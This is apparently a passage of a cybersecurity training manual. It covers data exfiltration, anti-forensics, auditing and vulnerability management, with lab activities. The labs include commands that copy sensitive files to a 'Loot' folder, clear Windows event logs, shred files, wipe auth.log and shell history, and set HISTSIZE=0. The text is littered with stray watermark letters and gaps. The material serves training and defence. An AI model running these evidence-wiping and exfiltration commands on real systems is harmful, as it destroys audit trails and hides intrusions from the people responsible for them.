For example, data loss countermeasures may inspect all outgoing packets for any signatures that
match a database of known file signatures. If the attacker simply transmitted a sensitive document
e
by itself, the countermeasures would immediately identify that image and shut down the connection.
ut
However, if the attacker embeds the sensitive document in a benign image, the data loss system may
let the transmission continue unabated. The system won't see a difference, and neither would an
administrator if they decide to inspect packets manually.
ib
In this case, not only is the data exfiltrated, but the leakage goes undetected as well. If the attacker
finds success in steganography, they may be able to exfiltrate a great deal of data over a long period
of time. Even if the organization learns of the leak, they may not know where the leak is coming
tr
from and how to plug it.
is
D
or
e
Figure 5-13: A document embedded in an image. Using steganography, the image appears no
at
different.
lic
organizations to outright block sensitive files from leaving the network. Ideally, sensitive files would
stay within the organization's perimeter at all times, but users' desire for convenience and portability
often outweighs this decision. If an employee works from home and needs to share important
financial data with another offsite employee, they may turn to a file sharing service with the
D
assumption that it is access controlled and reasonably secure from intrusion. This may be true, but
the more the organization allows file sharing with external cloud services, the more channels they
ot
sensitive file outbound for Dropbox, for example, they may allow it to pass. Those systems won't
necessarily be able to discern legitimate from illegitimate use of a single file. So an attacker doesn't
even need to have access to the employees' official Dropbox share—the attacker can open their own
o
share, drop the files in, and then the data is leaked.
D
ACTIVITY 5-4
Assessing Data Exfiltration
Data File
e
C:\CNX0013Data\Analyzing Post-Attack Techniques\DT_Watch.zip
ut
Activity: Assessing Data
Exfiltration Before You Begin
You'll be using both your Kali Linux VM and your Windows Server in this activity.
ib
Scenario
tr
Now that you've identified how an attacker can compromise your Windows Server, you'll want to
see how easily the attacker can pull information off that server. This server stores information about
is
a new technology that Develetech is working on: a smartwatch. You'll exfiltrate an archive
containing sensitive smartwatch files from the server onto your attack machine. In a real attack, the
attacker would then be able to make off with the data and leak it to the public, sell it to a
D
competitor, or engage in other behavior that could undermine Develetech's brand.
1.
or
Prepare your Windows Server with the sensitive data.
a) On your Windows Server, create a directory at C:\ called CurrentProjects.
b) Extract the DT_Watch.zip file to C:\CurrentProjects.
e
Gain remote access to the server and search for the sensitive data.
at
2.
a) On your Kali Linux VM, right-click the desktop and select Create Folder.
b) Name the folder Loot and select Create.
lic
e) At the prompt, enter dir to list the contents of the default directory.
e
ut
ib
tr
is
D
f) Enter cd C:\ to navigate to the root directory.
or
g) List the root directory's contents. Verify that there's a CurrentProjects folder.
e
h) Navigate to this CurrentProjects folder.
at
lic
up
D
ot
N
o
D
e
ut
ib
tr
is
D
or
From an attacker's perspective, this has a lot of company confidential information that they could
e
make use of.
at
A: -r
e
ut
ib
tr
This transfers the entire DT_Watch directory to the Loot directory on your Kali Linux VM. The
download should take only a few moments.
is
e) Navigate to the Loot directory in Kali Linux and verify that all the files are there.
D
or
e
at
lic
up
D
ot
N
o
D
7. What other methods could an attacker use to remove data from the
organization?
A: Answers may vary, but could include: physically connecting removable media to the server;
exfiltrating over FTP/S; exfiltrating over HTTP/S, using Netcat as a backdoor to read and write
files over the network; and more.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
TOPIC E
Assess Anti-Forensics Techniques
In this topic, you'll assess how post-attack threats will attempt to disrupt the organization's forensic
investigations.
e
Anti-Forensics
ut
In the realm of cybersecurity, anti-forensics is the process by which an attacker disrupts or impedes Anti-Forensics
a forensic investigation. The attacker can do this by: Inform students that
ib
• Negatively affecting the quality, quantity, or integrity of evidence. forensics will be
discussed at the end of
• Making forensic analysis more difficult or impossible. the course.
tr
• Deceiving forensic investigators.
Since the purpose of forensics is to discover who did something and how, the attacker will likely
is
have one or more of the following reasons for disrupting that process:
• To escape notice while they are still inside the perimeter.
D
• To eliminate themselves as a suspect after they have concluded the attack.
• To frame another person or group as suspects.
• To waste the organization's time and resources.
or
The anti-forensics process relies on weaknesses inherent in computer systems, forensic tools, and
the human investigators themselves. There are several techniques available to the attacker that can
exploit these weaknesses.
e
at
an attack on Kerberos.
However, newer golden ticket generators have corrected this oversight and are now able to populate
the ticket with less-anomalous information in the domain field. For example, the ticket may instead
D
use the system's NetBIOS name, and any automated forensic systems that evaluate domain logons
may fail to catch this new behavior. This can make it difficult for the forensic investigator to piece
together a narrative of events that led to the domain controller being compromised.
ot
N
o
D
Figure 5-14: On the left, the logon event is recorded with an invalid domain name. On the right,
the logon event is recorded with the correct NetBIOS name.
Buffer Overflows
Buffer Overflows The attacker can target the forensic investigator more directly by initiating a buffer overflow of the
investigator's tools during analysis. If the attacker leaves behind files in the wake of an attack, they
can effectively set a trap for the investigator. When the investigator goes to view or run the evidence
they've gathered, one or more of those files can trigger a DoS condition by causing the investigative
software to hang or crash. In fact, the malicious file(s) could be crafted in such a way they always
trigger a buffer overflow, so the investigator has no hope of actually analyzing the evidence. Even if
the investigator decides to move on to analyzing a more benign file, they won't necessarily be able to
e
avoid triggering more buffer overflows in unpredictable files. This can be frustrating and lead to lost
time and productivity.
ut
The following are two examples of how an attacker can cause a forensic tool to overflow:
• The attacker creates an infinite loop in memory by crafting a document file that exploits
ib
vulnerable dynamic-link libraries (DLLs).
• The attacker can execute a heap spraying attack through bitmap files. Heap spraying is similar to
tr
a buffer overflow—the attacker injects malicious code into an application's memory heap in
specific places. The bitmap file, when opened in the forensic application, may force the
application to read memory from the sprayed heap, executing the malicious code.
is
Most popular forensic tools have kept up with these vulnerabilities and have issued security fixes to
mitigate buffer overflow attacks. However, attackers may still be able to exploit forensic toolkits the
D
investigator fails to keep up to date.
Memory Residents
Memory Residents
or
A piece of malware that resides in memory can be identified by the operating system as a memory
resident—that is, the OS is not allowed to swap this memory to permanent storage as it does
e
during normal execution. Most memory residents are critical OS files or often-used programs that
need to load quickly by taking advantage of RAM's speed, though these techniques are less common
at
in modern operating systems. Malicious software, particularly viruses, run as memory residents to
stay active even while the application it is normally attached to is no longer running. This makes
lic
is running, and no files in storage match malicious signatures, then a malware identification program
may give the all clear. However, the infection may still remain in memory, ready to execute if certain
conditions are met (like the OS finishes loading). However, some modern forensic tools are able to
scan a computer's memory to detect anomalies.
D
Program Packers
ot
Program Packers A program packer is a method of compression in which an executable is mostly compressed. The
Example CVE ID: part that isn't compressed includes code to decompress the executable. This all combines into a
N
CVE-2015-1462. single executable that, when executed, begins to decompress the entire code before that code
Example CAPEC ID: actually runs. In this sense, a packed program is a type of self-extracting archive. There are two main
CAPEC-570. advantages to program packing: reducing file size, and increasing the difficulty of reverse
o
engineering the file's contents. Organizations or individuals who share proprietary software may use
program packing to deter theft of intellectual property and violations of copyright.
D
However, this is also something an attacker can use to their advantage. Packing malware makes it
more difficult to detect and analyze for many anti-malware solutions. They often compensate by
identifying all packed programs as malware, but this complicates the matter with false positives. For
a forensic analyst, it may be difficult to accurately mark an executable as a maliciously packed
program without some serious effort to reverse engineer it. This is because packed malware, until it's
unpacked, can mask string literals and effectively modify its signatures to avoid triggering signature-
based scanners. This can waste the analyst's time and resources. However, an analyst can work
around this by unpacking the executable in a controlled sandbox environment.
e
analysis, personnel also use these environments to run automated malware analysis tools.
ut
Malware is able to detect that it is running in a sandbox usually using one of the following methods:
• Detecting direct hooks into the application. Sandboxes hook into programs in order to monitor
ib
the calls they make to system libraries. A malicious application may be able to detect these hooks.
• Exploiting unpatched zero-day vulnerabilities in the sandbox's software.
If malware detects it is running in a sandbox, it can respond in a number of ways to hide its
tr
presence:
is
• It can stay dormant, only to wake on the system once it detects usage patterns likely produced by
a person and not a machine. For example, the computer is unlikely to use the mouse, so the
malware may be written to activate only upon mouse movement.
D
• It may also be able to run trivial computations for some time to fool the sandbox into thinking
it's benign, at which point it will execute the malicious part of the code.
Note that, because VMs are ubiquitous in production environments these days, sandbox detection is
not as useful to malware authors as it once was. Most competent malware authors assume their code
e
will run in virtualized environments that aren't explicitly set up to analyze malware.
at
Covering Tracks
lic
Once an attacker has completed their attack, they'll often attempt to disrupt the forensic process as Covering Tracks
they leave the target network and systems. Their aim is to make it as difficult as possible for forensic
investigators to identify how the attack commenced, and who is responsible. There are many ways in
up
clears every log rather than specific ones, this may raise suspicion; however, it can still make it
harder for a forensic analyst to do their job.
• Clearing discrete event log entries. Rather than wiping a log entirely and giving investigators
ot
something to be suspicious about, attackers may remove specific entries that could reveal their
attack. For example, an attacker with access to the Linux syslog can delete specific entries while
leaving the log itself intact.
N
• Changing event log entries. Rather than directly removing an entry or an entire log, it may be
more beneficial to the attacker to simply alter entries. For example, altering a user logon entry in
Windows security logs may enable the attacker to frame another individual.
o
• Erasing command-line history. Certain shells, like Bash shells on Linux, store the last n
D
commands in history. A forensic analyst can retrieve this history and piece together the attacker's
executed commands. However, the attacker can cover their tracks by setting the command
history to zero before executing their commands. For Bash and similar shells, this command is
export HISTSIZE=0
• Shredding files or erasing data securely. Since simply deleting a file using standard OS
features won't erase that file securely, attackers may resort to data wiping techniques to prevent
forensic investigators from recovering the incriminating information. On Linux systems, this is
known as shredding, because the shred command can overwrite files on storage to ensure
complete removal.
• Using any of the previously mentioned anti-forensics techniques. These techniques cannot
only hide an attacker while they still reside in the network, but the techniques also may be able to
help the attacker cover their tracks as they exit.
e
ut
ib
tr
is
Figure 5-15: Disabling shell history and shredding an exploit file.
D
ATT&CK
or
The MITRE Corporation's Adversarial Tactics, Techniques, and Common Knowledge
(ATT&CK™) model addresses the post-attack techniques discussed in this lesson, and more. This
freely available resource tags each specific type of attack with a unique ID, places each attack in one
or more post-attack categories (e.g., lateral movement), and then describes each attack on a technical
e
level.
at
ACTIVITY 5-5
Assessing Anti-Forensics Techniques
e
You'll be using all three of your machines in this activity.
ut
Activity: Assessing Anti-
Scenario Forensics Techniques
Now that you've explored the possibility of an attacker exfiltrating sensitive data from your systems,
ib
you need to consider that such an attack won't be so easy to detect. Attackers cover their tracks to
remove evidence that could implicate them in the attack, and they also seek to hide the attack's
tr
existence altogether. In this activity, you'll play the attacker attempting to wipe all traces of data
exfiltration. You'll remove event logs on the target server that could implicate the source and vector
of the attack. Also, consider that the attacker may not have direct physical access to the attack
is
machine—they may have compromised an organization's machine to use as a launching point for
exploitation. So, you'll also erase evidence on the Kali Linux VM that could indicate a malicious data
D
transfer took place.
It's important not to
delete the Security log in
1. Verify the traces of your exfiltration attack.
or
a) On your Windows Server, in Server Manager, select Tools→Event Viewer.
b) In the navigation pane, expand Windows Logs and select Application.
this activity, as students
will be reviewing it in a
later lesson.
e
c) In the list of entries, verify that there are several entries with the source sshd.
at
lic
up
D
These entries are created every time an SSH connection is initiated. The details pane even reveals
the source of the connection. You'll be clearing this log to hide evidence of your Kali Linux VM's IP
ot
The Linux-based smbmap utility is primarily designed to enumerate network shares, but it can also
execute remote commands on a Windows host. The wevtutil command clears the event log
specified—in this case, the Application log.
The prompt should return if there were no errors in execution.
c) Switch to your Windows Server, open Event Viewer, and verify that the Application log is completely
blank.
d) Close Event Viewer.
3. Securely delete the data you exfiltrated to your Kali Linux VM.
a) On Kali Linux, enter the following command: find /home/kali/Desktop/Loot -type f -
exec shred -z -u {} \;
The shred command works only on files, so you need to pair it with find and the -exec option to
execute shred on all files in the specified directory. As for the shred command itself, the -u option
e
removes the files after they've been overwritten, and the -z flag does a final overwrite pass to hide
the fact that shredding took place.
ut
b) Enter rm -r /home/kali/Desktop/Loot
ib
tr
is
This command removes the directory.
D
c) Verify that the Loot directory and its contents are gone.
4. Clear the login and command execution history on your Kali Linux VM.
Consider having
investigator to analyze.
b) Enter echo "" > ~/.zsh_history
or
a) At the Kali Linux terminal, enter sudo bash -c "echo '' > /var/log/auth.log"
This clears the Authentication log so the attacker's login information isn't recorded for a forensic
e
students open the This clears a log file that records the user's history of entering commands into the Z shell, the default
at
clearing the signal that cannot be blocked, and the $$ refers to the process ID of the current shell.
Authentication log
d) Close the terminal.
requires superuser
privileges, it will not be e) From the Kali Linux desktop, select the Log Out icon on the top-right panel.
up
5.
A: Answers may vary, but they could delete individual entries of an event log rather than the entire
D
log. This may arouse less suspicion, but will typically take more time and finesse to identify each
and every relevant entry. The attacker may also forge log entries rather than delete any of them to
misdirect a forensic analyst.
Summary
In this lesson, you analyzed the last phase of the attack process: the post-attack phase. You assessed
how attackers can remain in control of your network and systems even after the main attack has
been launched, and even after the incident response team thinks it has contained the situation. You
also assessed how attackers remain stealthy and evade detection so they can continue to exploit the
organization without its knowledge. Lastly, attackers will attempt to thwart the forensic process to
remain unidentified, and you assessed what tools and techniques they use to accomplish this. Being
e
able to detect and analyze post-attack processes is an often overlooked, yet crucial, skill for the
ut
cybersecurity practitioner to have.
Encourage students to
Has your organization or an organization you're familiar with blocked or use the social
ib
otherwise restricted services that may be used in a C&C operation? If so, which networking tools
ones, and why? If not, do you think it's a good idea to restrict any of these provided on the CHOICE
services? Course screen to follow
tr
up with their peers after
A: Answers will vary. Organizations may have blocked IRC in the network, as this is the most well-known
the course is completed
vector for C&C operations, and most organizations have no use for this chat protocol. Other
is
for further discussion
organizations may have blocked ICMP and P2P networks for reasons other than C&C, and may see and resources to support
the blocks as being an added benefit in light of C&C threats. Students whose organizations don't continued learning.
D
block any particular services to mitigate C&C may have done so deliberately; the organization could
use particular services like social media sites and cloud repositories extensively. They may not be
able to restrict these channels without disrupting operations.
A: Answers will vary. Some students may see the golden ticket attack as particularly devastating because
e
of how an attacker can move to domain controllers and essentially compromise the entire
at
organizational forest. Others may see pivoting as a major threat because of how quickly and, in some
cases, easily, an attacker can use a single compromised host to spread through the network.
Students whose internal hosts routinely use remote access services may be wary of how an attacker
lic
can use these services to move laterally from host to host. Even hosts without any overt remote
access services enabled can still be the victims of such an attack.
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
up
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
resources for a more continuous learning experience.
D
ot
N
o
D
e
ut
Posture
ib
Lesson Time: 4 hours
tr
is
D
Lesson Introduction
or
Now that you've analyzed the threats to your organization and their attack process, you can
assess just how prepared your current security posture is to defend against these threats. The
assessment process includes multiple methods and tools that will assist you in identifying
e
weak points in the organization. More importantly, assessment will reveal how to correct
these weaknesses and mitigate risk in the organization.
at
Lesson Objectives
lic
TOPIC A
Implement Cybersecurity Auditing
The first assessment technique you'll focus on is auditing. Through an auditing program, the
organization can ensure its cybersecurity efforts are in compliance with all relevant laws, regulations,
and policies.
e
ut
Cybersecurity Auditing
Cybersecurity Auditing Earlier, auditing was defined as an evaluation of the organization's adherence to established and
ib
relevant policies, regulations, and laws that govern cybersecurity. An audit might assess the
governance practices themselves, but more commonly, an audit is conducted to determine whether
or not the organization is in compliance with existing governance practices, and if so, to what
tr
degree. The objects under review include everything from the technical implementation of security
software to the execution of business plans that support security—anything that affects or is
is
affected by cybersecurity governance.
Audits can be performed by many different kinds of personnel. An auditor can be internal to the
D
organization, reviewing cybersecurity against organizational policy, or the auditor can be external,
reviewing cybersecurity against industry or legal obligations. Organizations can also enlist external
auditors to perform an assessment of organizational policy if no internal auditors are available.
or
However, regulatory audits are always performed by independent parties—typically under the
auspices of a government agency—in order to avoid a conflict of interest.
Cybersecurity auditing is a repeatable process of evaluating the organization's security posture.
e
Regulatory agencies mandate audits at a pace defined by the regulation, whereas the pace of internal
audits is up to the organization itself. Risk-averse organizations with adequate funding will likely
at
perform audits on a quarterly basis, whereas other organizations should perform audits at least
annually, but preferably semi-annually.
lic
2. Prepare for the audit. Identify your criteria for success and determine the optimal tools and
techniques to move forward with the audit.
3. Conduct the audit. Monitor, assess, and evaluate the elements that you identified as being
D
crucial to meeting the audit's objectives, and document your findings as you go.
4. Finalize the audit and share results. Communicate your findings to the appropriate audiences,
while also suggesting remediation actions to fill in any gaps you identified in the audit.
ot
N
o
D
e
• Remote access and VPN policy to ensure that employees who work from home or on the road
ut
are not putting the network at unnecessary risk of intrusion.
• Data security policy to ensure data is being stored, retained, and destroyed according to a clearly
defined lifecycle.
ib
• Personal data handling policy to ensure the organization is keeping PII private.
• Communication policy to ensure sensitive information flows from authorized user to authorized
tr
user and does not leak out to a wider audience.
Some examples of procedures useful to an audit include:
is
• Patching procedures to ensure software is being correctly updated to fixed versions without
disrupting critical services.
D
• Control testing procedures to ensure the effectiveness of security countermeasures is being
periodically reviewed.
• Intelligence collection procedures to ensure the most useful and actionable data is being collected
or
about potential threats, and that irrelevant data ("noise") is avoided.
• Incident response procedures to ensure first responders are working as a team to quickly and
successfully mitigate the effects of an incident.
e
• Evidence collection and handling procedures to ensure forensic investigators are not
contaminating or otherwise improperly handling evidence.
at
Objectives of an Audit
lic
One important component of developing an auditing policy is clearly outlining what you hope to Objectives of an Audit
accomplish in the audit. Each organization is going to have its own set of objectives that pertain to
up
its unique operational practices and ways of doing business. An auditor will need to consider many
different factors when determining these objectives, including:
• The organization's size, e.g., number of employees and overall market value.
• The organization's workforce, particularly how and where employees perform their daily duties.
D
• The organization's business goals, like marketing new products and services.
• The organization's past history of cybersecurity incidents, particularly if it has fallen prey to data
ot
breaches.
• The organization's legal obligations.
• And many more.
N
Even though each organization's audit objectives are tailored to that organization's needs, there are
some objectives common to most audits, including:
o
• Ensure all aspects of the business are in compliance with the relevant internal and external
requirements.
D
• Identify gaps where software and hardware resource are not meeting baseline expectations.
• Identify gaps where security technologies are not meeting baseline expectations.
• Identify gaps where business operations are not meeting baseline expectations.
• Determine whether or not security training and awareness campaigns are effective.
• Verify that backups of critical data are being taken and properly managed according to
requirements.
• Ensure that facilities and premises are adequately implementing protection against physical
intrusion.
• And many more.
Compliance Audit
Compliance Audit Although an auditor is unlikely to be called on to audit legal and regulatory compliance for their own
organization, some independent auditors are contracted by government agencies and/or industry
watchdogs to perform such audits. If you're in this role, you need to be aware of what is expected of
e
you from both the entity that commissioned the audit and the subject of that audit. Of course, this
ut
will depend on the compliance standards you're auditing the organization against, as well as the
organizational factors mentioned earlier.
Likewise, as a security practitioner in an organization subject to compliance audits, you need to be
ib
prepared to facilitate the audit as best you can. This means being proactive about compliance,
ensuring you have a plan in place to follow all applicable laws and regulations in your daily activities.
tr
Most of these As part of a compliance audit, you must be able to identify all sources of compliance that are
compliance sources relevant to the organization under audit. Examples of sources of compliance that are relevant to
is
were discussed in the cybersecurity include the following.
beginning of the course,
so they should look Type of Compliance Description and Example Sources
D
familiar to students.
Data privacy Privacy compliance sources focus on ensuring that
users' personal information cannot be accessed or
threshold.
Public sector Public sector compliance sources apply directly to
o
e
has requirements for ensuring the health and safety
of personnel in both public and private sectors of
ut
the U.S.
• Health and Safety at Work Act, which has
ib
requirements for ensuring the health and safety of
personnel in both public and private sectors of the
UK.
tr
Non-regulatory Some compliance auditing involves non-regulatory
is
standards and frameworks common to an industry.
Members of the industry who agree to adhere to these
standards and frameworks, as well as those seeking
D
certification, must still prove compliance. Examples in
the world of cybersecurity include:
or
• ISO/IEC 27001, which has requirements for
information assurance that organizations may
choose to seek certification for. Certification is
performed by third parties, not by ISO itself.
e
• COBIT, which has requirements for IT
management and governance that organizations may
at
COBIT.
Asset Identification
N
One of the most crucial aspects of any audit is identifying assets subjected to the audit. If you Asset Identification
o
developed a useful set of audit objectives, you should be able to more effectively perform asset
identification. For example, if one of your objectives is to identify flaws in network intrusion
D
detection systems, it logically follows that any hardware or software systems that implement network
intrusion detection will be assets to cover in the audit.
An organization that's adequately prepared for an audit will plan ahead and inventory their assets,
like a database that contains the serial numbers of all laptops provisioned to employees. This makes
asset identification much easier, as everything you need will already have been documented,
including "where" those assets are (i.e., either physically or logically on the network).
You won't always be so lucky, however. If assets are not thoroughly documented beforehand, you
may need to scan the network for relevant hosts, or actually look for those hosts on the premises.
Also, some assets are not fixed objects that you can necessarily "find," but rather abstractions that
are nonetheless crucial to the audit. For example, the structure of the network can reveal a great deal
about your organization's security posture, but you may need to map that structure yourself using a
tool like Nmap.
There are so many potential types of assets there's not much point in listing examples. Basically,
anything that implements security, is affected by security systems, can be targeted by an attack, or
that has any kind of value to the organization, should be considered an asset as part of audit. Asset
e
identification can seem like an arduous process, especially in large organizations, but there are plenty
ut
of asset management platforms that can help automate and streamline the process. Also keep in
mind that focused audits (e.g., audits assessing compliance to only one specific policy) may not
require the organization's entire set of assets, just a small subset.
ib
Audit Results Documentation
tr
Audit Results The final phase of the audit process is to communicate the results you've been documenting as you
Documentation go through the audit. Most auditors have checklists on hand that they refer back to throughout the
is
process. The checklist might literally present questions that the auditor checks "Yes" or "No" to
(e.g., "Is remote access turned off for the Administrator account on the domain controller?"); it
D
might present a scenario the auditor has to score on a sliding scale (e.g., "From 1 to 5, how secure is
the customer records database from unauthorized access?"); it might ask open-ended questions with
spaces for open-ended answers (e.g., "Does the cloud vendor apply adequate encryption to all
network traffic?"); and so on.
or
Whatever form the documentation takes, you must ensure it records useful information and is
tailored to your unique objectives and assets.
e
at
lic
up
D
ot
N
Audit Tools
Audit Tools Aside from manual auditing tasks like reviewing a checklist, there are also tools that can help
automate the auditing process. These tools, typically referred to as audit management solutions, have
several benefits as compared to manual auditing. They can:
• Save the auditor a great deal of time.
• Be more effective at gathering the required information.
• Increase the accuracy of an audit, eliminating errors, duplicates, and ambiguous data.
• Generate more robust documentation of audit findings.
• More easily integrate with a large number of target systems that have differing requirements.
Most robust audit management software includes components such as:
• A user interface.
• Compliance templates and checklists.
• Schedules with which to run auditing tasks at a chosen frequency.
• Automated suggestions in the event of non-compliance.
e
• Reporting capabilities, such as summarizing compliance levels through text and visuals.
ut
• Support for different documentation formats to enhance interoperability.
• Cloud synchronization so that audit information is centralized and easily accessible.
ib
tr
is
D
or
e
at
lic
up
environment.
• Secureframe—a proprietary solution for auditing compliance using the System and Organization
Controls (SOC) type 2 framework for reporting. SOC was developed by the American Institute
N
of Certified Public Accountants (AICPA) and is used by CPAs to conduct independent audits
related to cybersecurity and privacy.
o
• Gensuite—a cloud-based proprietary solution for auditing against a wide range of standards and
regulations, including NIST 800-53, ISO/IEC 27001, PCI DSS, HIPAA, and more.
D
• Open-AudIT—an open source web-based solution for auditing system configurations across
Windows and Linux environments.
typically share the results with their manager, the CISO, or another key decision maker in the
organization. The format of this communication can take several forms, including:
• A written report the audience can easily read on their own time.
• A slide presentation, which provides an opportunity to use visuals to communicate your
message, as well as an opportunity for your audience to ask questions in real time.
• An interactive website the audience can browse at their own pace.
None of these options are necessarily better than the others; it all comes down to your own comfort
level and available time, as well as how your audience prefers to receive the results.
e
Regardless of the format, there are some universal best practices to consider when drafting an audit
ut
report:
• Don't drown your audience in a sea of numbers. Adapt the presentation for different
audiences you must address, including only information relevant to that audience, avoiding
ib
jargon, and explaining things in a way the audience will understand.
• Avoid suspense. A good presentation flows well and tells a story, but not in the way a mystery
tr
novel tells a story. You will likely provide your audience with a lot of information to process, and
they will have questions and concerns. Help them understand and buy into your conclusions by
is
anticipating the types of questions you think they will have, and sharing important points early
on.
• Provide context for details. If you must tunnel down into details showing numbers, tables, and
D
charts, be sure to connect them back to the main idea or point you're trying to communicate.
• Be honest and transparent. Be clear regarding how you obtained results. Don't hide significant
data or results—even if they don't fully support your objectives or proposed solution.
contain errors. or
• Check your work. The quality of your findings may be called into question if your presentations
• Invite feedback. Make sure your audience has a chance to ask questions so you can provide
e
clarification and promote buy-in.
• Provide solutions, not just problems. Although an audit report should obviously mention gaps
at
in security and other compliance shortcomings, an audit is not helpful unless it also provides
suggestions for remediating these issues.
lic
Guidelines for
Implementing Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
Cybersecurity Auditing CHOICE Course screen.
D
audit.
• Conduct an internal audit at least annually, preferably semi-annually.
• Identify and consult various cybersecurity policies and procedures in your organization during an
o
audit.
• Weigh various factors when determining the proper objectives of an audit, such as the
D
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 6-1
Conducting a Cybersecurity Audit
Data File
e
C:\CNX0013Data\Assessing the Organization's Security Posture\audit_form.zip
ut
Activity: Conducting a
Cybersecurity Audit Before You Begin
You will be using your Windows Server machine for this activity. The XAMPP web server should
ib
still be running.
Scenario
tr
Develetech is required to perform routine audits of its critical server infrastructure. As part of this
is
audit, you'll review some of the security settings on your Windows Server and the Active Directory
domain policies it enforces, and compare them to the organization's baseline security policy
requirements.
D
In addition to the logical security of the server, you'll also audit its physical security. The server is
located in a large server room near some offices. The only entrance to the server room is a door that
or
requires key card access. Each key card is assigned to an authorized administrator so entry into the
room can be controlled and logged. The lighting in the room is always on so that administrators
don't have to remember to turn the lights on and off when they enter and exit. The server itself sits
on a shelf so that it can be easily moved to make room for new equipment.
e
To conduct the audit, you'll fill out a simple form that will help you keep track of successes and
at
failures in the audit. When you're done with the audit, you'll present your findings to management so
any problems you identified can be fixed.
lic
Be prepared to help
students answer the
audit questions. 1. Set up the audit form page on the server and navigate to it.
up
a) From the data files, right-click audit_form.zip and select Extract All.
b) In the Files will be extracted to this folder text box, type C:\xampp\htdocs
c) Select Extract and replace all files when prompted.
d) Open a new web browser tab and navigate to http://localhost:80/audit.php.
D
e) Verify that you are on the Windows Server Audit Checklist page.
ot
N
o
D
e
b) Open a PowerShell window and enter Get-ADDefaultDomainPasswordPolicy
ut
c) Examine the results.
ib
tr
is
D
or
e
d) Using the results, select either Yes or No to answer each question.
at
c) In the Local Security Policy window, from the console tree, select Security Settings→Local
Policies→Security Options.
e
ut
ib
tr
is
D
or
e
d) Using the list of policies, select either Yes or No to answer each question.
at
b) Use the activity scenario to determine the answers to the audit questions.
c) Select either Yes or No to answer each question.
e
ut
ib
6. What are some of the audit failures you encountered?
tr
A: The server should have failed the following audit questions: 1.1, 1.2, 1.3, 2.1, 3.4, and 3.5. Most of
the failures center on the domain password policy and the server's physical security, with one
is
failure in the local security policy.
D
decision maker?
A: Answers may vary, but you can tell your audience the server is failing to meet the password
or
requirements set out by company policy, and that these issues should be corrected in the domain
policy and then pushed out across the domain. You can also suggest that Microsoft accounts be
explicitly prevented from logging on to the server to correct the one local security policy failure.
From a physical security standpoint, although being able to move the server around is more
convenient, the administrators should securely fasten the server to the shelf or some other surface
e
to prevent it from being carried out. If they need to make room for new equipment, they should
at
better plan where to place existing equipment and the new equipment. Lastly, you should suggest
that the company install automatic lights so the lights turn on when administrators enter the room
and turn off when they exit. That way, passersby can't see into the room when no one's around.
lic
TOPIC B
Implement a Vulnerability Management Plan
Before you start evaluating your organization for flaws, you need to formulate a plan. This will
ensure that you're well-prepared to manage vulnerabilities, no matter the circumstances.
e
Vulnerability Management
ut
Vulnerability The methodical process of discovering, analyzing, and controlling every vulnerability associated with
Management unacceptable risks is called vulnerability management.
ib
Certain vulnerabilities related to your organization's information systems put your organization at
risk for various compliance- and security-related issues. Through your risk management processes,
tr
you can identify some security- and compliance-related risks that you can accept or transfer, and
others that you need to reduce or avoid.
is
By thoroughly examining your systems through vulnerability assessments and penetration testing,
you can identify sources of vulnerability to those risks that you need to reduce or avoid. This
D
essentially produces a to-do list of flaws in your systems you need to remediate. Identifying and
implementing specific corrections for each vulnerability enables you to harden your systems to
reduce or avoid your organization's risk. Once you have implemented a defensive system
or
configuration, you should also continually monitor, test, and adjust it to ensure the necessary
configuration continues to remain in place and continues to be effective over time.
The Vulnerability There are several general steps in the vulnerability management process.
Management Process
Step Description
lic
1. Inventory Identify all systems that exist within the area you plan to manage. Identify
and document the operating system platforms and functions associated
with each system, and identify any unauthorized or unmanaged systems.
up
3. Identify and assess Ensure that you and your assessment tools are approved to scan the
vulnerabilities and systems and information you've identified. Use vulnerability scanners and
exposures other tools to identify vulnerabilities and other ways your systems may be
ot
Note: Steps 5 and 6 are sometimes referred to as "post-assessment" tasks, as they are conducted
after the assessment proper.
Requirements Identification
Before you can generate a baseline of acceptable configurations and behavior for your systems, Requirements
you'll likely have several different requirements these systems need to meet. These requirements can Identification
come from within the organization or from without—in either case, you need to identify exactly
what risks your systems must avoid to fulfill these requirements. Once you've identified these
requirements, you can conduct your vulnerability management tasks with them in mind, so your
management program accounts for the most crucial vulnerabilities and provides the most efficient
response if vulnerabilities are discovered.
e
Requirements come from a variety of sources, including:
ut
• Asset inventory: You don't just inventory your assets to know what to assess, you also do so to
identify how to assess them. This is because not all assets are of equal importance to the
organization, nor does each asset present the same level of underlying risk. You may choose to
ib
define assets in terms of being critical or non-critical to the survival of the business; the former
will likely require more scrutiny than the latter. The nature of an asset will also determine the
tools you use to detect and manage its vulnerabilities.
tr
• Regulatory environments: Your organization is likely subject to several technical regulations,
which vary by industry and by the nature of the organization's business operations. These
is
regulations often concern what types of data you can store, and how you must protect that data
from unauthorized access. Your vulnerability management plan needs to incorporate external
D
compliance requirements into its baseline so the network and systems in the organization are not
bringing about the risk of legal action.
• Corporate policy: To secure the business against risk, your organization will most likely have
or
one or more policies that dictate its expectations, like an acceptable use policy. These policies are
a necessary reference in any vulnerability management program, because security personnel
cannot assess and remediate vulnerabilities unless they know what risks the organization is
willing to accept, and what risks it is not. What's more, the vulnerability management program
e
must operate within time and budget constraints, both of which are affected by policy
at
requirements.
• Data classification: This is a major component of many corporate policies, as it enables the
organization to correctly assess the business value of the information it stores and transmits.
lic
Similar to taking inventory of physical assets, classifying data as sensitive versus non-sensitive
helps the vulnerability management program determine how vulnerabilities in data handling
should be identified and remediated.
up
The part of your vulnerability management plan that deals with executing scans and other Execution and Report
assessments should answer various questions, including: Generation
• Who will conduct the scan(s)?
ot
The majority of scanning tools will generate a summary report of all vulnerabilities discovered
during the scan directly after execution completes. These reports tend to color-code vulnerabilities
in terms of their criticality, with red typically denoting a weakness that requires immediate attention.
Other tools assign scores to each vulnerability using their own metrics or using other industry-
recognized metrics. Useful reports also go into specific detail about different categories of
vulnerabilities and how the scanned system does or does not exhibit flaws with regard to these
categories.
You can typically save reports to a file for easy distribution to the relevant audiences. Some tools can
be configured to distribute reports automatically to a set of predefined email addresses. You may
want to opt to distribute reports manually if the results require you to carefully explain important
context during a meeting with stakeholders, lest the results be misinterpreted. This can also prevent
sensitive vulnerability information from being sent to the wrong people.
e
ut
ib
tr
is
D
Figure 6-4: Part of a post-scan report. or
